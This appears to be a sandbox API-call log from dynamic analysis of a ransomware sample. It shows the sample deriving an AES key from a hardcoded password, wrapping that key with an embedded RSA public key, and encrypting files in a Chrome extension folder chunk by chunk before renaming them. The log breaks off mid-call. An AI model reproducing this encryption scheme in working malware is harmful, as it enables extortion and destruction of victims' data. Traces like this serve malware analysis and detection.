CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0262.322] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0262.322] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.322] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.322] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0262.322] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.322] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0262.322] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e73708) returned 1 [0262.323] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73708, dwCertEncodingType=0x1, pInfo=0x2eacda0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacdd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacdd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7da80) returned 1 [0262.323] CryptEncrypt (in: hKey=0x2e7da80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0262.323] CryptEncrypt (in: hKey=0x2e7da80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e732c8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e732c8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0262.323] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e732c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e732c8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0262.324] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.325] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.325] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.338] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.338] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.338] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.338] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x241, lpOverlapped=0x0) returned 1 [0262.338] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x241, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x250) returned 1 [0262.338] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x250, lpOverlapped=0x0) returned 1 [0262.338] CloseHandle (hObject=0x5d64) returned 1 [0262.338] CloseHandle (hObject=0x5d50) returned 1 [0262.339] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), bFailIfExists=0) returned 1 [0262.342] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js", dwFileAttributes=0x0) returned 1 [0262.342] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg")) returned 1 [0262.343] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.fuck")) returned 1 [0262.344] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0262.344] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0262.344] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.344] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0262.344] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0262.346] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.347] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.347] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.347] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.347] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.347] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.347] GetLastError () returned 0x0 [0262.347] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json")) returned 0x20 [0262.347] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json", dwFileAttributes=0x80) returned 1 [0262.348] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.348] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.349] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.350] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.351] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.351] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.351] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.351] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7d940) returned 1 [0262.352] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.352] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.352] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e72828) returned 1 [0262.352] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72828, dwCertEncodingType=0x1, pInfo=0x2eace70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacea0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacea8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ddc0) returned 1 [0262.352] CryptEncrypt (in: hKey=0x2e7ddc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.352] CryptEncrypt (in: hKey=0x2e7ddc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e728b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e728b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.352] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e728b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e728b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.362] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.378] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.378] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.380] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.381] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.382] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.382] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.383] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.383] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.383] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.383] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.383] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.383] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 